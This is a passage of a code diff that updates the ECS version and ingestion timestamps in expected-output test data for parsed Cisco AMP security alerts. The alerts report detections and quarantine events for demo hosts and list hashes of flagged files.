22c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}", "kind": "alert", "start": "2021-01-14T20:38:26.000Z", @@ -172,7 +172,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -192,7 +192,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843503140Z", + "ingested": "2021-09-13T18:07:04.510329357Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -247,7 +247,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -267,7 +267,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843505081Z", + "ingested": "2021-09-13T18:07:04.510331307Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -333,7 +333,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -363,7 +363,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843507024Z", + "ingested": "2021-09-13T18:07:04.510333230Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":7120,\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -424,7 +424,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -456,7 +456,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843508958Z", + "ingested": "2021-09-13T18:07:04.510335159Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -518,7 +518,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -548,7 +548,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843510902Z", + "ingested": "2021-09-13T18:07:04.510337055Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":4788,\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -609,7 +609,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -641,7 +641,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843512823Z", + "ingested": "2021-09-13T18:07:04.510338972Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":478000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -694,7 +694,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -714,7 +714,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843514761Z", + "ingested": "2021-09-13T18:07:04.510340840Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -765,7 +765,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -785,7 +785,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843516637Z", + "ingested": "2021-09-13T18:07:04.510342728Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -836,7 +836,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -856,7 +856,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843518525Z", + "ingested": "2021-09-13T18:07:04.510344635Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -911,7 +911,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -931,7 +931,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843520650Z", + "ingested": "2021-09-13T18:07:04.510346697Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -986,7 +986,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1006,7 +1006,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843522517Z", + "ingested": "2021-09-13T18:07:04.510348605Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1061,7 +1061,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1081,7 +1081,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843524393Z", + "ingested": "2021-09-13T18:07:04.510350482Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526294\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1136,7 +1136,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1156,7 +1156,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843526269Z", + "ingested": "2021-09-13T18:07:04.510352372Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526293\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1211,7 +1211,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1231,7 +1231,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843528155Z", + "ingested": "2021-09-13T18:07:04.510354257Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526292\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1286,7 +1286,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1306,7 +1306,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843558928Z", + "ingested": "2021-09-13T18:07:04.510356238Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526291\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1361,7 +1361,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1381,7 +1381,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843562131Z", + "ingested": "2021-09-13T18:07:04.510358126Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526288\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -1436,7 +1436,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1456,7 +1456,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843564045Z", + "ingested": "2021-09-13T18:07:04.510360004Z", "original": 